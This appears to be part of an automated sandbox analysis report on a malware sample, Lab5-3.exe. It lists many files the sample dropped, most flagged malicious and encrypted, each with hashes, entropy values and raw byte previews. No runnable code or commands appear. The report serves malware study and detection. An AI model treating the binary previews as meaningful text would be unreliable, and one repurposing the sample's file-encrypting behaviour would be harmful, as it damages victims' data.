                                                                                                          Size (bytes):31488
                                                                                                          Entropy (8bit):7.994345065175712
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:2cr5pPPyzBK8rPCNaxPOmDPcATtCJjtpw8AbtLZCo4o0QP5QZ:rrryzBK8rKNaVTjCJje5clZ
                                                                                                          MD5:3C61F15BF4FFE74CA9EEB423C4A892A7
                                                                                                          SHA1:53B91ED0D41649F4288D08379B546E879EF32E2D
                                                                                                          SHA-256:E8504740504E5F462384348FB67C16CA44CA6B860C988E3A24C510CB27D5C57E
                                                                                                          SHA-512:494B5AAF150527A1B7777A1AB9F968F5E3C9040D8F5E36161A1FE5BD8E3C49F8F0A8FD455EF2EBB07584E5FC5638437EDEE2989D8D971CD440A745DEAD16D817
                                                                                                          Malicious:true
                                                                                                          Preview:(Q.. ...`............Q.2.l.K.O.A".@.P.q......h].N|.0..r..f]qe..,.p..?.....9M...........,m..%:./v..Z.$S.8..^.-..0fC.W....j... -t..N...v..v5...0.J4..%....I.K.5..]...PO...^.>....S.l...=...] ..^..{..*9O....J@.+.zO3.:H..S......C....>t@.a.....ReD.Z.F.........T{...X/a.~n...P...2.....q..Qz..VW..Vhv$..<^M.4kE'....Q..4e.H..KO.};..HV./Q._)O..w.d...y......<...h..{........SSREc....x..:XI...:.(..$..N<..PqzzP..h.s.dq.ky...a....Wk..V\.. .`.I..........x.y..gw.....]#...+`...../...v}...q....._...x~...T...Y.8..}x...4.y.@...o..1.p..0...!..D..Do.....f.....,.X5.........?.J...m.....<..(.g-KEHh..p..?<...,Ic...'...z7.*]....Y.jT0.....Td.......Q.A]......S%1 ...h..u.5.Y..P.....f.k...|.$`.A .......EV.`(8......?E*..w..aK.N.....GZ.....7...}...*U..!....^.8.....4.N.[.x.....;..(,j.e....B............>N\......4u..\..p./8.{)../......%..iAxS.uB.(.V'.....+z..o!...s ~+^1...#=6..M.s.....Yf..\A[....]...y^......B.....a...-y.....=...A...29.....-......|..R.=..|:..9...3
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):26624
                                                                                                          Entropy (8bit):7.9922369661460495
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:k3YGxie49WDbreNj8A3OoM1mQ64SKl/pJRpPfDpi5ZxhIJqGR6XEnqIW14C61nCZ:s7qdQnSK/JRJU5daqa6VzuVCZ
                                                                                                          MD5:D1BD26BC71E8B6F38C1217C5F481B179
                                                                                                          SHA1:84F45D43C445F00A54681C0BD4E5F7DD11365950
                                                                                                          SHA-256:935387180702EF3C8C7F4DB998E091C20EB8DA2059C9583134607388E4441DF6
                                                                                                          SHA-512:8234B631483E03E8CD3FD3E7348C991F60D61A289DD65C108669804B120004DD1AAC92E2EC7AF031C557C1E1F40A48CAD6D5982F106ECA60B95736ABAA0F209B
                                                                                                          Malicious:true
                                                                                                          Preview:v..)...../V....e....Fl.4.)..\q..).........y..{.SiQI....68.@.. ...j..... f_..+fW2..-.<Q$s..-..q...WE.<JB...._).........3.e...Tk..r.Sm.......2.B....,pu.=...iX.......!.....b..g...=.)@y....=.o...G}G.R..@...X.........G.............6h%S...Y...H.T...5v.fl..^..5.\.i{.*v...!.....Z7..*w..gr..Vx)%.X+=....9*....$."$..T..)..-. c....Y....?..v.......m+..$.-0.H(..=......9.0.r.>.~..n...V.PO.F......+.t?.N.......Z...}.8.....t...m.='?6>..{..@.e.~..^-.{..x.@.n!..y.(.dj.o..Z.P..\)....])1...OF.HHC.Z'..-...........)....S!*<.......@O*.*..o+.Q.{...Cp".8...U.R..<...e.fX...z.i*.b.PI.R7...V_U.IY&....z8oH.C3.85.......i...L."/\0.c.Wp.+.Sk...FJ...K......O..-...y...}i...n....I.I..`P.e..\....]X....~..D...t<.k....r...7....)..e....J...YCn....L..6......o..E... <....sE...(..6....c.3.....(.^9ksN....._^_+9...T..(E.....7Z{.....D5..*..eh...x...gj..s.....?E.....4Cy...[...| CW.c.7G.{.~...JJm.5)7].Uw..:......h.....~*.SJ/.kF >.....M8s......Q.}.,.....pk1..A(*..8<......k..1.Y
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM, 0x8C-variant)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):44800
                                                                                                          Entropy (8bit):7.995637683644682
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:oyP3eSMKdH1s4m6CLKIM1nlwy773sPltXZi6Y3vks1iLgQR6otXnmmuV1lvZ:oy/BH1sb6KUwy77m3JiBM/t3dGlvZ
                                                                                                          MD5:8304B6BDADDAD10A806B62665859FAE9
                                                                                                          SHA1:3B0A65FE233E16A2B0F14946B153BB202EF9416C
                                                                                                          SHA-256:CD839A4C9F00024DFC039682388D3D397D6BAED7C1A581CF7A8343EEADFD4A64
                                                                                                          SHA-512:5365A5A1AA022FEA3211117D197F855011ADEFF6B99099E14447DBC4F99B2775B7D7B9D38D870FAE1D8E46081B1565CF8C38BBD7A7F93C4028C7F9F830C4C692
                                                                                                          Malicious:true
                                                                                                          Preview:.rVQv6N.......{AA......[....J.XA`........[p..0.E.~.#........w.[...@\.)}.)%.......\..7..I........;..0...V...K.c.En.n.U.v^.B#r.7.......n-.....f]h...E..Nw.n........!...;.H.Wr.B...........-W..l....S.......U..l.n..U.#..D...p.$..Uus...s....W1..3.`......Q..S...b]I..M.V.tY...^..Q.....qr......!....2m..LF.r..}>.....{.W}G..9.*i.#.....$R..E23$....[.j...Q..xzN...?O.h..3@.K...j.t.\V.....E.=.&W..D....]..S...6..1.....8Bsn.....6...?Z4w=|.A...(... .T|R.~..../.6.-...M]`.w.N.g.....h.=7z..2.....}.r...*P.@..,.x....o!.'....$k.-W....j....*......|.E.....U....J`.m.......&.._m.3.6..^.yV.r...v. ......>....b..g|V.*otHH]KG....w.VM...5.8G...8hO..........._*tA...rX....Ol..h.-.:aL....).~.........a[.!.,@.,..&..8..J........TO....P.3...l.....5>.!..M.Z]..}J[.y/.D..i.r...h)....g.B......[yb.....L8G..g...*.....-....zc{..<...DDY......<9y&I.S..H\..8C...d.".t.Q.Vy&...~tF../..6)......Fu,~..7wxk..c.D(..r....m....+B..i..?.%+/|...x..>...%.iP.h?..G........s`....#|...)G.ad.KR.5'2e...d
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32560
                                                                                                          Entropy (8bit):7.994252352088081
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:NISS0Y7CkCwJAwfkeuJcTFDny42YZ4I9Tr6xsUOXaRNY2V2Z:vSN7CeaXeecd2YZ4I9n6+UmaRNp2Z
                                                                                                          MD5:67DB0C8DF0007B3CA99AB4FE6C3F4C8E
                                                                                                          SHA1:F6E7509BB46C969DBFD2E0AD4AD7B7871A4FEFEF
                                                                                                          SHA-256:DA631B4C09E112D404C6008AC0377B283B76D8ABF9A873691A674736C83171BB
                                                                                                          SHA-512:EE670E09CAAA1B13CD2E8BA6EADC525FA9694AA0C096CBB65086D4F2765FFFE86112FE52E740505A93B862FA3AE32BCD415A013266E039D422D43333A6A62C2F
                                                                                                          Malicious:true
                                                                                                          Preview:.....j..Dy~.x....o.z#N .....g...KE....B.C..ts.%.@~g/.g......@.@..1.]V"2....i....OL....+.......Zw..O..z.-.*kY...,..i..a".d?I..../.........Y.....nN..s-...-.........@...hZ....5F`xQ..YG5.?...V..s'.D.5........lY..s....r....{..k...km.b..E...F?......."m..W9..b......Sf..R..M@....O.hy'.8.o..ewf.m......r."Oi.zn.07..fg.s.0..((......[d.5Y...k.G#...G....c".).Q}[x...j.3!.<..Z..N...a.).z........H...w..y..c.2....DSY....o.pe..I."l....A.J..V....5.!;.&v.Z......_...E`C...n.....b)B.v.(.....[.|....2h);.M....~..d..f0_Z.p$bqo6....:7?..Pu,s}..t...D...Z\...N...%..o.L.rW4.G.q.;.G...=B.f........!/..O...An..-{.a...._.|...o=..{........9...../..$#b.C.6.N[_.Z1t...e...<."{..)p?.....*...f.pze' d@..X....2.<.f....{.s(Al;D......'.?m...Pp.j..x<.%-..a.RiZ..Q...F.......c....+...+.$..YW.g7...".k.-....,@r.\..A...2.C1Y........).YX.........0^E....G...Fw#.H...m......U.R...~.0.z...y..c.\K..!R...<.n.s..k...i.M......g.&..S..'.d.i.BPs..\.....;..:^...1.F..h.m[...'.=.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):30080
                                                                                                          Entropy (8bit):7.993369126086293
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:JZPIrFBsvL6SaNSbwiLs5ueerUtLC60PrFzZdv4vKZDbJUZAmkS4sZkmVnkDiUbp:cHvSj6uezW60PJ1xoAVynVkuczDZ
                                                                                                          MD5:669AF98E5B0D0919B9D746086FF02A5D
                                                                                                          SHA1:ECA5BBE6E370D098AE88876DD52A904E7D2163A4
                                                                                                          SHA-256:6AD35E3A7E1C76B55DF260780ED943BF4EAD3A6C6A8553EF6138EE2E7E3C2116
                                                                                                          SHA-512:769F21CB7F9E3A990380708D3FCB4A5D47C3C98318FD34235AA7EC89E447579F84664FDF28745CDDF0C4E97181B8786B0D8B5CD0CC94B9554023854EAD99D354
                                                                                                          Malicious:true
                                                                                                          Preview:.3.Z.A..B..P'..O.|.d...C.......H..+.n.o.K./72.-...y$.....YH..+^..O..%).6..1.....U.....,.?..)..B..#.$..r}.N.I..z..Z........8yT8.a}.h.....C.Y....}k...J.<.cF....w.......`..F....gy."AJ...a.M..9.].h..0.w..^..Uz[(Po.....n/.H.y.......L..._..X]....0(..l$......U.yl..L..SC..@5.... .,.....#.T.....B..'..x<....|.0`....5.r.......3&c.d.V|..........N....@iC..>1...9.%a.wm.X.......&.9fF"Us[,{D.|7.........zH...xt..##..X...D..O...@.....D.~=..L..u..F.....8...M.o...M+O.....6.9....8^..=..F..;Gc..;.5..s........S.(..'9..T.N.2.o~.}..P.'.[6.H..../.7.,.. q..y..E.%Lo[rf.Ui..$.._......q.w..&.b.M..S].........I..........zBI..3.....8h\J.../3x.E..W...G...Bi.R.y.q......Iz.M0.,.;...f6..|...?.>...=6=.K.Km,%..yS._.B.7.T)..@..v... ~~..H...= ....=..k.<......D.....@......VW....JX].p+.I......$.A..K.'....6..3..().X..F?...*.r>\.~#5....aJF.....IIK."..z....R.,.O..H...i.c...%..:.Q.A....<D.....d._A..H].MU...;~ a6TU...)Q.......4_p...O{.......=......2..X..r...l2u.,t..Ly...I...r
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):29184
                                                                                                          Entropy (8bit):7.993506469710481
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:D1y99SAzHDu4c64UpouS9+3AOnylgQeV3I0oCl8chfaA+r279/kfbktQgn6CSeay:UkAzju4EUGlDCY0sdTrSOQz/Na6K6Z
                                                                                                          MD5:23A533A4A53559F5317373626F06C625
                                                                                                          SHA1:B67D8BB380D23EE9303C56561DACF2EC2E8DE6E2
                                                                                                          SHA-256:A3554581DFF4A0734872AA83DB63B6C538D080FA96E9D2045DBD22196F46C20F
                                                                                                          SHA-512:4ADB9A82DC10CF1D545C56A9B6C23C98F913CC0D2BA4FCFBAA53D05B028EB3DC10FE5449F7DF1A7E2DC126508BCD81608DF6A3698B2A412D4C3700FBE04FAFB7
                                                                                                          Malicious:true
                                                                                                          Preview:/.o.<BhqS...p.KC|..M..{...0j.5.D..'C7>...{.<.P.:O.`/......S..uX..3*BF..._....O\....vkA.Y..A)-Y......"...i.$..|..v.....6...*..v...U..z....y|...5..G...._.B...N..n....m9.6[....S.W.'f..`..qS.K@/3.+....e<..w.!..2.Bm..|...!..2..2.:h,"..'.$........-J.,.u.!.#G..W....=V.s..>lG].....o.4...6.....a.c.}....1..%.va........Ec..X..q.,6^...l...~.V5.S..|.[...V...y'..,n..u$>.z[....e.2.s....7.K...p........N_c\.|.S.h..Y.7!.6......2d.t.i6..8...8..p.J...l-.Kk.<..O..'.~...a."........3....6......:n3.....Bq...'...V.UyD<......[..rQ._.G.[../..c!..rE..k....S.$[{.C9&.B.v.p*V&K...lD....;V.k.n:'.Tb3;..N{Ch%*....0C.....=..n{,.f..I..&...^}..%.S.}..b.....8e..1.+#..k...U..oQ..u...*..9...\.r.B....>.01?+..U.!.HWQ....~.+.a.\/t=.........jR...OR...<..8.R$..Sm.].%....`.AcP.6H.....a..l......{.....Mr....T.X.;...t.2.....rk.[..2.=Cz...Y.R...T......:XQ....6|.Y'..b..1%....x#B>..8.L...).X.)/...:b..oa+.kG........b.Z..5.f..../F.....g..J.s./J}h...K./.A.^..XoYhfus..vD.2..<...l"....d6.W...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31536
                                                                                                          Entropy (8bit):7.9937232800907845
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:tHgxlBSPrhsQrUzBaTyEJQiMNMpWYYUWFKZjykhXPsK87BZ:tHg9QhsGcaTHQiMeWYYUFykCF7BZ
                                                                                                          MD5:C616A79994CEF8968718D2D26B0F1626
                                                                                                          SHA1:3EE288E641DF29F5E86320F41B37471E6CF8B12B
                                                                                                          SHA-256:A1B5D46E530A1F5E35049C8549181BB1C9DEB38B8B21FD24433C1D53102D274E
                                                                                                          SHA-512:79A79849B675BFDCF21234484B4B2C5767DC213BA2037532E433D8E3B5F1FB05C2F86066ED237191EBD1531BAF1C8E8FDE8FF7FA821FD78A457DB25FFD9CAE67
                                                                                                          Malicious:true
                                                                                                          Preview: Tv@.S%..m...u{...ed./It.1}....H,......6)PB.:.t..CPE..b.....My?.m.6wsh.............{4A..e.....YRw.~...F.0.h5...8...{.....{.j,@......g.....O....@..G3.....K^....jI...f.....X.......l.O...u.[,..'..d.F..Ho.o...Z.q.........D|8...Oo!.w2.Jy8.w1M.,.W_K..7A......@...xn.:..T#b}O..e5..m/...4.A{|.......^@?.#...=$...Z..c....?...n....."...;...J\....:..!y.&.9P]f...o{^...Xj..].O..!mP.i-,.d..v...E`$...Zi4dl.>......6=\H.>...J....&.$...w.../ic(......0@....u...|g..[.>...(..|...".r........v....(....S.....X..@......+..WZ..?e..z..N!Fo.H.i.X.F..>:.)./..:...~X...>.D.)...T.N.G=..MV.G.~FQP.l...F.j..05...oO.{..|6.Ve..[..P..,....>J.7v...Zu.p.>..c......N.ihk.:t.6+.;:\>&m<.....X.p.....Ns....i.n........3!M3.wV...f...4EN.Hk..8....t.UC..(....-2.i7...p[....BiN@e.@..T.-WU......E.mB. .<....IZu...o.Y@.&E....9.Tt.M7C}J..B&.0XY$..AZ.ww......"L...u|]R..j..@..&8....W..U.v..........w..B...f.(..g.J~..H..=.ZX.KO...`...;..n.X.r.1...T*3...9......:..PS.F._...T....p...P.)cg.f..3xf.L7.... ...^
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2768
                                                                                                          Entropy (8bit):7.933282879441079
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lOr1jb7Pfj2qrBFnF8wknTkFVHkVFHHfUTid3hBaUoSGFcmeykEdEElU92i:l41v7jrBEgHkVaGx0uKeY2ElUJ
                                                                                                          MD5:2020B809457C823054076CF3AE92F77D
                                                                                                          SHA1:0E5F6E06708CADE4966ACD2A3CDCE14726BD12FA
                                                                                                          SHA-256:BA0854482A381579B507A6A92B6CBB48F6129D1A77E0043A7ECD42214C3CC0F3
                                                                                                          SHA-512:A4782C90D3ECAD24ABD402FB58CD3090126A14747FF83215FAE16476BD4F6272EEA3B5503ACC55E55817A8DAFAC4B166A2AF0E73D2E9C236CC32B629CBC36D6D
                                                                                                          Malicious:false
                                                                                                          Preview:B9..*.`Ww..=.I../......F.MY.....$...0....fi.;....5.....bTbL...B..Q.I.../.7;P.Wa...e..mO..}.@8......D......x.`..U..N...P.X.K{...a7-X..lg....V.....P<.3..vHD...m`.V.....g!....B....t..U.o.......^z^.b.P...nt..q.^.5.8....D".L...E.....H.jI.6.cI.....,N.H.......b....i.o&..7@O....E..4....*...u...F....mc..v`R..;.E..r..O.....s...../...y~..4.DR..:a...~:..S..S.p..t...r...B..u..h,....}..].Zp....[.+''.7V..7.&j9.(@.......2...j...i...r2|.]..AC.z.u.~.9..9G..]L...v#.U..UA..8..<.6.&.......RIY.....p.y...LEk.!q....^[.r.*...S........V.'....XF.Q.....Fl?.+.7....,...j.......+..Yk..`...b.L...".U..k.A.k......!.....(.1VR.F..(-..(K).......%l...."..)...(...t......-..U...n.N.w.......T..r..+...]7.'.5.n-.E...,.8..F}._...x....#..T{.Hm.B.....M..4....>..(.[....^..)yWb+g'%.$9.o..R.}0.B.A.....UA(D......jnEziI.5[U. ..@".!)...8a0.i%...W..J.dc..4..T..wo.X....L..A.-.v. `.;..".%@i..n../...8.dt......{..7.........J:...l.#....5.....4...,.41........_?.....P..{D......[.%...=-......4.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):45200
                                                                                                          Entropy (8bit):7.996155150641733
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:Cg9F8zNFThBJUOMCtSqUAQv0/QKB54vtSavJsXC/71CRNgmBznkTZ:Cg9F8zrhM0zJQ8/QKIldvJyy4fpBoTZ
                                                                                                          MD5:3C092537FBAA0525D4D72D9A022EF347
                                                                                                          SHA1:5D489D6AFE2415C9A986AA4E2A4CA71612E6D846
                                                                                                          SHA-256:B1F32CF8554FDBFB201F6747FE082EE9CB6040FF3DB14B620383E510C82511C1
                                                                                                          SHA-512:7006BAB8B51A23622C5841EA8325F51CF703B0032EB3C52ADCA493385BA9B4CEB31092560ED3C0D9813BEFE263B48334BFE36DE7DAAFBA691C361A54BF96D497
                                                                                                          Malicious:true
                                                                                                          Preview:..a..,.}............m..v...~.P..@....0.b.....c.K.+?.....2...W....~.!Q|..3C...#.q..jO..#2.>N.}s...\1d>...i.J...,...@.d.':0..C....Q.............d.U..w..3.5..E.....N.....i.0.n.5........V..^Vgl/`7O..0`.}..[....:.....0....E.*..{.i........s...z+.=.@...!....;I`_.......j...Nn...Uh..C..&..R......eL".I}N..Jp_.lZo.4.g.&4..b.^.....e..A.......0Ap...}%.Q.5...#../....l....0.d....f.g.A0.S....@?7........./......dA...Y.s.V.wQ..2M...!...+.X.........r..p.?..h..@@;....[....u.*.j.....D.#.l...SC?{YB.gMaf........x..9..."..t.......J.1...H.I.]g2...^.3..Q)..n.&...,..j...?H..jn......FO....,+...{.[....u....^$.N.>....~..z...1.../..^J6u..........L...(.|....d.0.s...?0.N.j%S.."l..vN>+U.T......U.s..e.....j+..G...T4..R..E..."?.(.tH...g&.@..v..3..7.:....7V........ A...}.GKV.4..b........-........Oj.w@.Q D.^....\%...x6.Aq.s.W...h(.~k.1......9L..H. ..WdU.y......;.6]..{w..ots...Nl..?I..P?!.2......#..'i....aN..h..B..|.4..E.O..wV...mX..m.O.\..6g....u_..x.V.6..j.....%.8.~...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):27520
                                                                                                          Entropy (8bit):7.993442530901942
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:PTQMRWxf1ZvRQBcFrjJaTO30vWSkR6YxKAtyOoAFGZ:b7Kf1Z2aorrYEGGZ
                                                                                                          MD5:CAB05AE9C3D5C11FD0F49F2E03DDA68E
                                                                                                          SHA1:08E6B9EE75CD7A066891CD47135BDE4297739D0D
                                                                                                          SHA-256:10C9F5B609B053CEAC3DEC7D0B78E2978ABCB44B5E52A67F37B986D45871AC6B
                                                                                                          SHA-512:5BEBD961E841973A701537DA565C232C10DB050B3FDD5C5CBC9AF4F2D65B63829A62F0B1409A71BDDAC70AD4E5DD2ACED94D18DE66D727605E8376E8406571F2
                                                                                                          Malicious:true
                                                                                                          Preview:Vt.....z....-d.i-.O...H..<...B=.u.}.P.1S..sY...{..E/.....OY.a.0M.8.....K[j.n....T...x1K...z.yP....1.y~...-.tc....a.(. .~.H...E......`).UJ...]/.4...._..U...S/.0.7.....$.(...#...`..-B.5\.h./CS.]....O..?M..l........E....^....h..5..TO}.'......{..S.Kz'|*t.sB.^\..g.|hz.}t7..G..t...3.t..F+..8'..`...C......$!...*C.\{G.y.......h.....d..-..8}e.V......c\.*...~.....V.A ......eT..mt?.....3....y....rNZ......t....>...|..lLd2!....^.EE...UCw...1J}....'.....{...4[tl..ggGRy!LtA|.v{3'^.s.o...'/....b.W..U...VLS.e&MRY.p......2rn.w.T..&.=.b.^.Al.^.....jT.e;.N.'L.V..#.O.?...r.*.u.....w.$U-~'.6.}.....T.;.fP185i,yJ..V.E!.o..:bi.Y.a..6)"..,..`./..1.,..k.+../..).@..T...._~)........h...B$n.!..Z.K`zf...e. ....A.O...H....{.T9...\.*4.k.....0y...d#...TS$...s. M.W..Z.....7.#....q.5U........E.=...Bn.3m....>"c.....[..B.r...+..O.&$'-..~.x.-..@Q...~..;.+..i'?...Rpi...X..."~...y...%..#.......c.8].....r.......N.0B............_<D.[G...#JL....jve.Y......$#..H^.)D...m.....a....W
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):27440
                                                                                                          Entropy (8bit):7.99255712159878
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:Cf9nKJSMOslgzXGmfvsZjAsp7x1v8ND7Z:CfFdM5lgOnxB67Z
                                                                                                          MD5:40E6B8D89CBA4AE90DD12A57316B400B
                                                                                                          SHA1:380C697505A9753068660464D23F862CD9AD5173
                                                                                                          SHA-256:7273AD4B102C7CB98D71299BAF56CEEB1AEDCDEA3607A79066316721D9F1248A
                                                                                                          SHA-512:234CBE10C2FDE41C62A2D9F0D0EC75BCCA04CA7CC8EE029E720C843F9251288635E712D7151CE0EB2B4344DCD7B955025DA84896D19049735780A446C0DAE80D
                                                                                                          Malicious:true
                                                                                                          Preview:G.5......B.pv..u..#...5.....C....R...G...[H...v.C.M.l...Ux.-..dt.......7.q..#..t.......r7>N.......W..=O.K........M..xF..J8.....9......g..K..f.W.....~...t.3<.G...v*t+..n.}Ap........F. ..['.... `D......K^........L..T....N.7.n.1^...k...Qggy..f-..(.g7..c.t.SGFB..Y.w..f .?.NS.........F.*r0..&"KHC..e:......D.w.t.-'.....pl......27.....e..O.k.F...p..b...=...}`W.Gf.........)o.t......4]F..d<.6.&.0[..}6j....%u}9o..,.KW_.V...i8.|-.k4.._{".'....x4%.../.u..G........6..>m....v.1O..k....&Z.=......|..g.C6?.)..vi. .D... .@.Hw.6):.My.}.oN...w_r...GFi.s.jCM#.#...m..].L....?....W.fP..U....j..O..b..-`.....=,.....@g".aN....i..}...pj....<.c`A.D.........i.G.1.8I..J.B^..0W..sr..Nw.....m.~.,j>.nl.$..y.zfa....Z..3v5....sEuu.*.ad.ZBbv.....:...K.:?..:)..dQ..o....\.....4:4..._v...6.;..<..[.mxQ.Av\=7.cU'$]_z3.[.M....s.Q.l...'..I.......>...N~\..O.../....ax..... g...}.?n...a....Z......`..=rM.Z...0q"7.;)..n...&..8,...:...3....'Y.g*..o.!.x*.,............n.+./\U..cm.2..8.F.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):501005
                                                                                                          Entropy (8bit):7.461485848596612
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:w77xRq3+cTkdjo9ei3ewXRnz6krS4rpPfDGo3uGIPxQTZwT7Z:w5820eo1fG4rpPC2o
                                                                                                          MD5:0DE54A45866D490490CB873D46A3C2D9
                                                                                                          SHA1:BB8B94543AA411BF631903DCEF7C06E65CD305CB
                                                                                                          SHA-256:5EF71824943CE68CD9315DDA72AFAC8FFA6EF8FB8015F2E3494079C6FE7AA19E
                                                                                                          SHA-512:39BDC0C8AF91258171681FED991F754329FB461047506DD29D030F4339967B5DDA9F7C84030ADBFC8A65D2688D2CD50FEB6C26413A25BBB87EEE71490860B87B
                                                                                                          Malicious:false
                                                                                                          Preview:.#vMuZ.2%S...-........K..)q........R#.)..z%.O..:...........y....|..._.h..L...@.. .QU.+..b.0..].tF2..w.(...)l..n.2.......Y..R...D..!.pobw..?E.....-.....E9."$......B.\.....s;...{.~Lc.....R`.^:..u9..].wz..~....dn=$?.`[.3I"lb.t....6.....6.......>d.d......*.;..^..1.:...q...R..47.....w....}8.jS.......9e.G.....B\..........E.s..c..+....r&.).X...vD.&@.N.......\Fc.....T(p.F..\.nUp(..v"...t.'..oy..6/..j...+#..L..1.\..j....>..C.C2Qp......}...+.Z........[.).S\O@a..+.?..f......=...Q..P...\...o...uo..l./..../(L......%../....=.Q..d4..gX. ...$8..,Z.[C..0....U~Vq...`.g.I..iS...|J.O..\.U'.\1..i:.9.q1.N;R..\ !.4B....o..z#....bNlV...=,..Q.|.....!..O..y,..A.o.......n!...............d-%.......!....]...N7.......O._...7q....... P7...D.....m.;..Bf.^.8.T..s....}..b>.q....C...7..n.~S.1.%......&f..=..3.AG.....Q.S.............9..M... m0...."U..%..R.%.;Fv..{m.Z...M....q.yj...Sq...*..0SxB.-..$.b.%.....wc.K...$...^.....d..j..h.....Dre8M./B..}pg....}.^..Y%g.t...I.n...eI^.4Wo
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):721230
                                                                                                          Entropy (8bit):7.992807617311855
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:12288:3BBnkvOypJf/j1MKUqknGdMcwXKF5XPG+X5Hhk28/rK0RxVFrCUHeZhbhGd3oWcg:vkvOypJXj1MDMxPG+X5BKRfFrDEhbhGP
                                                                                                          MD5:764D1EE43AFA0B0AF1C222A8D80F010F
                                                                                                          SHA1:3B407DF204F18F10DD87C0DF3F37BC1B175F49CB
                                                                                                          SHA-256:E59B5592099DF4A1167A8E07225ADE4C7EBD07B2AF778F63E8B74BB8461194CC
                                                                                                          SHA-512:044EC2F7E75A0DD33EDDA007D8C9E6E02DA2156DC2E3FD4A99405C1FBD69386457B804D56D977A501F9C86D0586AADA3665AC50ACA831BCFAF95A2B6AA245854
                                                                                                          Malicious:true
                                                                                                          Preview:./.W.\..O.y+f...r.zmc..P.....].;~.....N.Q.....~M=.r..>....X;.-.....X7..d...;X.z.....~|.G:....!.T......x.O1..$..'W.,k.-...c.Y..`.+....LK..."......e.o...wk...2.]/.3".:?^..a.*....r..g.:li..v...m..h.it.2E...clCs5.A.).3..I.J.2.../TC..ks...(..P`...gaM..-F......ZpU6Z.m.B-_z.p...<.B.3....o....%Bu.H.O0....[.....qE....l.~.XO.W..k.z...?..U.6...C..o/...^S\bp/.......)[..+b.E+I.1..,..n....3.|i.......Di....!Pug..IE.,.<...4..PqaHU..&....Qv.|.<.....*.u.6.D.-.._pD.v....].........B.r...xQ*.}...H...M<0..2...O?[.:=..~....F....$.s......V.k....A..M...n)v..2ut+:.k.$....a.@.k.Bg.b....f.9...$.u...[w..p..$...19E.(f-PB.F..?....B/.....kP,.Xq;y7.l4x..8..z.z.u...A...w..wJ....-2...Q...$..:#.....d.J|...28s..^...4.......8.Zc_..d......U.b.k0.J.5&O.yM.XBi..U....&@....C...L.w....B.A....y.........,.@..~........a..v...?.Kq.ggo..k..{..;....d.sZ.2....O.t..X....y.e....~.pe.8y....E7.I..#..H.}.;.~?..M .yq:.....F:r..G..J..F.....tK3...j....r.0K...*K/B.'}W.D1E........lm)..Z...z.F
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):698992
                                                                                                          Entropy (8bit):7.9921242904648615
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:12288:doxC+nPKJLFgZQyHj9tzCDGBvkh8SmZ6qstIpkrMOU1y6zScCaec06WwzTujXnh:s9nywZQyHfzCDGJgmcXtzrMvpScCaecy
                                                                                                          MD5:FC6B89F26B2D5276945600FE8A9F17BF
                                                                                                          SHA1:E08A316DA4F87E6F2B8F9EDAAF3321C1E679465E
                                                                                                          SHA-256:D985E633BCAB80929A41EDE37C0824C5ABFDC4FC6BC84C1AE480934B0CB5673A
                                                                                                          SHA-512:1BFA7F34EF87516D072F99A662D37FB0244DC605EE1A03A0C683141CCA385FDC16B3D85618C8252592CC2EF6F532413D70FF032CCAE980810732DF7F7E6A4BF5
                                                                                                          Malicious:true
